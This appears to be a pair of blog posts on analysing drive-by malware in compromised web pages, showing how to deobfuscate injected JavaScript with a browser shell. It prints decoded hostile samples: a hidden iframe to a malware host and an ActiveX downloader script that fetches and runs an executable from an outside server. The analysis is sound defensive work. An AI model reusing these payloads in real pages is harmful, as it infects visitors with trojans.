Skip to content

Decoding Javascript and Why We Like Our Browser

Exploits are often obfuscated to make it more difficult to detect nefarious activities. The reason that SpyBye is posing as a proxy server is to get your web browser to do all the decoding for us. This is not only restricted to javascript, but also applies to any other scripting languages or media decoders your browser might support, Visual Basic script, Windows Media Player, etc. Your browser is good at that, but we are not. However, when we suspect an exploit, we sometimes still need to manually investigate and deobfuscate. Take the following javascript as example:


<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7 %BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1 %F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF %C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";
str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}
document.write(str);</script>


We see that there is a quoted string and some javascript after it to decrypt it. Go over to the Web Development Bookmarklets and install jsenv as a bookmarklet. Click on the jsenv link to open up a window running the JavaScript Development Environment. Now, cut and paste the javascript from above - I introduced artificial line breaks, remove those. We also need to remove the HTML tags and replace document.write with print. The result should look like this:


e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7 %BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1 %F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF %C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";
str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}print(str);


Now press the execute button and see what happens:

Running in bookmarklet mode...
<div style="visibility:hidden"><iframe src="http://prado7.com/trf/" width=1 height=1></iframe></div>


The iframe instructs your browser to download a plethora of exploits. Obviously, this was just a simple example. In other cases, we see double or triple wrapped javascript that results in Visual Basic script to download an executable. Or we observe an exploit against WMF to causes a malware binary to be downloaded. That is very hard for us to simulate ourselves, that's why SpyBye uses your browser to do all the work.
Categories: Malware, SpyBye

Anatomy of a typical exploit

Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:

<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>


When visiting your home page, the single line of HTML causes your web browser to load additional content from an external web server. When looking at the content behind www.somehost.com/ment/, we find something incomprehensible to us. It's a block of javascript that consists only of numbers. Just by looking at it, we have no idea what the code might do:

<script>
t="60,115,99,114,105,112,116,32,108,97,110,103,118,97,103,
101,61,106,97,118,97,115,99,114,105,112,116,62,13,
10,118,97,114,32,117,114,108,44,112,97,116,104,44,118,97,114,49,44,118,97,
114,50,44,118,97,
[many more lines of numbers]
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>


However, it's pretty straight forward to decipher this if you have bookmarked javascript shell - just search for it. When using jshell to evaluate the javascript from above, it decodes to the following:

<script language=javascript> var url,path,var1,var2,var3,var4;
url="http://www.somehost.com/ment/bad.exe";
path="C:\\windows\\IsUno104.exe"; var1="Microsoft.xmlhttp";
var2="Adodb.Stream"; var3="Shell.Application";
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
var4=var4_1+var4_2;
try{var ado=(document.createElement("object"));
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
as.type=1;as.open();as.write(xml.responseBody);
as.savetofile(path,2);as.close();var shell=ado.createobject(var3,"");
shell.Shell(path,"","","open",0);}catch(e){};
</script>


This resulting javascript uses XMLRPC to download a binary from the Internet. It saves it on your local hard drive and then uses an ActiveX object to execute it. According to ClamAV, the executable is a Trojan-Downloader. This means that it is an application that can download an arbitrary number of other executables on your computer that can then happily sniff your passwords, compromise your bank accounts, display popups or use your computer to send spam.

All of this with just a single line of HTML. Amazing? Right!

The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.
Categories: Malware, SpyBye
Defined tags for this entry: , ,